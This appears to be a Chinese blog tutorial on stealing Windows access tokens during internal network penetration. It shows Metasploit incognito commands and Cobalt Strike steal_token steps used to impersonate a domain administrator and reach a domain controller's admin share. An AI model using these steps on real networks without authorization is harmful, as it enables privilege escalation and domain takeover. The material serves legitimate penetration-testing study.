当前位置:网站首页>内网渗透令牌窃取
内网渗透令牌窃取
2022-06-23 16:17:00 【西湖第一剑】
令牌
令牌是描述进程或者线程安全上下文的一个对象。
不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,
不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Toke
访问令牌分为:
授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等)
模拟令牌(Impersonation token):非交互式登陆(例:net use 访问共享文件)
两种 token 只有在系统重启后才会清除;授权令牌在⽤户注销后,该令牌会变为模拟令牌依旧有效。
Metasploit进行令牌窃取
此工具需要提权为system权限才能查看所有的token
#加载模块
use incognito
#列出token
list_tokens -u
#窃取token
impersonate_token 'AA\Administrator'
meterpreter > impersonate_token 'AA\Administrator'
[+] Delegation token available
[+] Successfully impersonated user AA\Administrator
meterpreter > getuid
Server username: AA\Administrator
执行完命令后,通过以下命令返回之前的token
rev2self
##或
drop_token
Cobalt strike实战窃取域管理员令牌
提权为system之后,查看进程,发现火狐浏览器是以域管理员身份运行,进行窃取。
beacon> steal_token 1260 窃取令牌
beacon> rev2self 恢复令牌
成功后,访问域控成功相当于提权为域管理员权限
dir\172.16.2.2\c$
边栏推荐
- 三分钟学会如何找回mysql密码
- 创新技术领航者!华为云GaussDB获颁2022年云原生数据库领域权威奖项
- The evolution of social structure and capital system brought about by the yuan universe
- DataNode进入Stale状态问题排查
- Golang data type diagram
- The summary of high concurrency experience under the billion level traffic for many years is written in this book without reservation
- 右腿驱动电路原理?心电采集必备,有仿真文件!
- Look, this is the principle analysis of modulation and demodulation! Simulation documents attached
- The Google play academy team PK competition is in full swing!
- stylegan3:alias-free generative adversarial networks
猜你喜欢

Google Play Academy 组队 PK 赛,火热进行中!
![[solution] NPM warn config global ` --global`, `--local` are deprecated Use `--location=global`](/img/14/a2b3df1e8d0cf06ec96d6df9104a4a.png)
[solution] NPM warn config global ` --global`, `--local` are deprecated Use `--location=global`

走好数据中台最后一公里,为什么说数据服务 API 是数据中台的标配?

Identify and stop the process that's listening on port 8080 or configure this application

网络远程访问树莓派(VNC Viewer)

Importance and purpose of test

JS common error reporting and exception capture

The official Chinese course of zero foundation introduction jetpack compose is coming

Network remote access raspberry pie (VNC viewer)

stylegan1: a style-based henerator architecture for gemerative adversarial networks
随机推荐
OutputDebugString instructions and exception handling
Google Play Academy 组队 PK 赛,火热进行中!
Look, this is the principle analysis of modulation and demodulation! Simulation documents attached
DataNode进入Stale状态问题排查
leetcode:30. 串联所有单词的子串【Counter匹配 + 剪枝】
科大讯飞神经影像疾病预测方案!
JMeter stress testing tutorial
ASEMI肖特基二极管和超快恢复二极管在开关电源中的对比
出现Identify and stop the process that‘s listening on port 8080 or configure this application等解决方法
Zhongda face sketch FERET database (cufsf)
Counter attack by flour dregs: MySQL 66 question! Suggested collection
Intel arc A380 graphics card message summary: the entry-level price products of running point and bright driving need to be optimized
走好数据中台最后一公里,为什么说数据服务 API 是数据中台的标配?
How do you choose to buy stocks? Good security?
Code examples of golang goroutine, channel and time
What are the risks of opening a fund account? Is it safe to open an account
Golang write file code example
Image saving: torchvision utils. save_ image(img, imgPath)
ABAP essay - material master data interface enhancement
[today in history] June 23: Turing's birthday; The birth of the founder of the Internet; Reddit goes online